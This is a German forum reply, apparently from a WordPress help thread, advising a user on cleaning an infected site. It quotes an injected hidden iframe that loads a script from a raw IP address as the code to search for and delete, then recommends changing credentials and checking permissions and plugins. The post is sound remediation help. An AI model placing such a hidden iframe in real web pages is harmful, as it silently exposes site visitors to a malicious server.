Hatte ähnliches Problem mal mit nem anderen CMS. Durchsuche mal die Dateien nach folgendem Code:
<iframe src="http://58.65.235.41/llll/stds/go.php?sid=1" style="visibility: hidden; position: absolute;" height="1" width="1">
</iframe>
Diesen solltest Du dann löschen (vorausgesetzt er lässt sich finden). Danach sind unbedingt alle Zugangsdaten zu ändern (WP Installation, Datenbank, FTP Server). Damit hast Du dann schonmal nen Schritt in die richtige Richtung gemacht. Kann Dir leider nicht versprechen, dass Du den Code irgendwo findest. Könnte auch irgendwo in der Datenbank stecken. Auf jeden Fall auch mal die Verzeichnisrechte überprüfen. Infos dazu solltest Du eigentlich hier im Forum finden. Sollten meine Tipps nicht helfen oder falsch sein, wird einer der Moderaten oder der anderen User Dir sicherlich weiterhelfen können. Das wären zumindest die Schritte, die ich als erstes einleiten würde...
PS: Oft findet sich die Ursache für solche Trojaner oder Viren auch in unsauber programmierten Plugins. Eventuell auch mal die Dateien durchsuchen.
EDIT: Da war jemand schneller ;-) Ich sollte mir abgewöhnen so viel zu schreiben :-D